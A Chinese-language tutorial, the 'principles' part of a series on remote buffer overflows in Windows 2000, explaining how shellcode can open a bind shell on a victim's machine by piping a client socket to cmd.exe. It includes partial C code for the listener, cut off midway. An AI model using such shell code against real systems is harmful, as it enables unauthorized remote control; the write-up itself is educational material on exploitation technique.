----前言我们来研究windows系统下的远程溢出方法。 我们的目的是研究如何利用windows程序的溢出来进行远程攻击。
如果对于windows下的缓冲区溢出不是很熟悉,请大家复习我前面的文章: 《window系统下的堆栈溢出》(IsBaseMagzine 20003)。 本文以及后续的《实战篇》都是建立在该文基础上的。
让我们从头开始。windows 2000 Advanced Server(Build 5.00.2195)
第一篇 《原理篇》
----远程溢出算法
如何开一个远程shell呢? 思路是这样的:首先使敌人的程序溢出,让他执行我们的shellcode。我们的shellcode的功能就是在敌人的机器上用某个端口开一个telnetd 服务器,然后等待客户来的连接。当客户连接上之后,为这个客户开创一个cmd.exe,把客户的输入输出和cmd.exe的输入输出联系起来,我们远程的使用者就有了一个远程shell(跟telnet一样啦)。
上面的算法我想大家都该想得到,这里面socket部分比较简单。和Unix下的基本差不多。就是加了一个WSAStartup;为客户开创一个cmd.exe,就是用CreateProcess 来创建这个子进程;但是如何把客户的输入输出和cmd.exe的输出输入联系起来呢? 我使用了匿名管道(Anonymous Pipe)来完成这个联系过程。
管道(Pipe)是一种简单的进程间通信(IPC)机制。在Windows NT,2000,98,95下都 可以使用。管道分有名和匿名两种,命名管道可以在同一台机器的不同进程间以及不同机器上的不同进程之间进行双向通信(使用UNC命名规范)。
匿名管道只是在父子进程之间或者一个进程的两个子进程之间进行通信。他是单向的。匿名管道其实是通过用给了一个指定名字的有名管道来实现的。
管道的最大好处在于:他可以象对普通文件一样进行操作。他的操作标示符是HANDLE,也就是说,他可以使用readFile,WriteFile函数来进行与底层实现无关的读写操作!用户根本就不必了解网络间/进程间通信的具体细节。
下面就是这个算法的C实现:
/******************************************************************* */ /* Telnetd.cpp By Ipxodi tested in win2000 To illustrated the method of telnetd. Only one connection can be accept, feel free to add select... to fit for multiple client */ #include #include
int main() { WSADATA wsa; SOCKET listenFD; char Buff[1024]; int ret;
WSAStartup(MAKEWORD(2,2),&wsa);
listenFD = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
struct sockaddr_in server;
server.sin_family = AF_INET; server.sin_port = htons(53764); server.sin_addr.s_addr=ADDR_ANY; ret=bind(listenFD,(sockaddr *)&server,sizeof(server)); ret=listen(listenFD,2); int iAddrSize = sizeof(server); SOCKET clientFD=accept(listenFD,(sockaddr *)&server,&iAddrSize); /* 这段代码是用来建立一个Tcp Server的,我们先申请一个socketfd,使用53764(随便,多少都行)作为这个socket连接的端口,bind他,然后在这个端口上等待连接listen。程序阻塞在accept函数直到有client连接上来。 */ SECURITY_ATTRIBUTES sa; sa.nLength=12;sa.lpSecurityDescriptor=0;sa.bInheritHandle=true; HANDLE hReadPipe1,hWritePipe1,hReadPipe2,hWritePipe2;
上一篇:MYSQL用户root密码为空又一攻击方法
下一篇:如何黑BBS公告牌
复制本页网址和标题,发送给你QQ/Msn的好友一起分享